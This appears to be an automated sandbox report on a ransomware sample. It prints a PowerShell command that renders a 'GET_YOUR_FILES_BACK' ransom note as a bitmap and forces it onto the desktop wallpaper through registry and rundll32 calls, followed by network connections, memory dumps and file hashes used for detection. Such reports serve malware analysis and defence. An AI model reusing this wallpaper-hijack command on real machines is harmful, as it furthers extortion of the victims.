powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\302165477.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
N/A 93.184.220.29:80 tcp
N/A 20.50.80.209:443 tcp
N/A 104.80.225.205:443 tcp
N/A 72.21.81.240:80 tcp
N/A 72.21.81.240:80 tcp
N/A 72.21.81.240:80 tcp
N/A 8.247.210.254:80 tcp

Files

memory/2556-132-0x0000000000000000-mapping.dmp

memory/1992-134-0x0000000000000000-mapping.dmp

memory/2784-135-0x0000000000000000-mapping.dmp

memory/2656-137-0x0000000000000000-mapping.dmp

memory/4880-136-0x0000000000000000-mapping.dmp

memory/3804-133-0x0000000000000000-mapping.dmp

memory/3612-138-0x0000000000000000-mapping.dmp

memory/4812-139-0x0000000000000000-mapping.dmp

memory/4956-140-0x0000000000000000-mapping.dmp

memory/4000-141-0x0000000000000000-mapping.dmp

memory/3612-142-0x000001BCCD040000-0x000001BCCD062000-memory.dmp

memory/3612-143-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

memory/3612-144-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

memory/4984-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb88ced2c4ccde482413852902ecd0df
SHA1 6ad26dfaaa606e82710ad0712d8b1c4abec1d6dd
SHA256 9cc249792c1a673ae90260e40d62521948daa94b01565a1c06b403cc86e39f5b
SHA512 7c1adea6f5e286712759055c3d9026260c9619b3bcb651283d342aff2fe3db16ebf5d82d1d30329169cfd8490fc86853ccc93b12a97cb071b7a74747712ff285

C:\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/2660-149-0x0000000000000000-mapping.dmp

memory/4984-150-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

memory/4736-151-0x0000000000000000-mapping.dmp

memory/4984-152-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp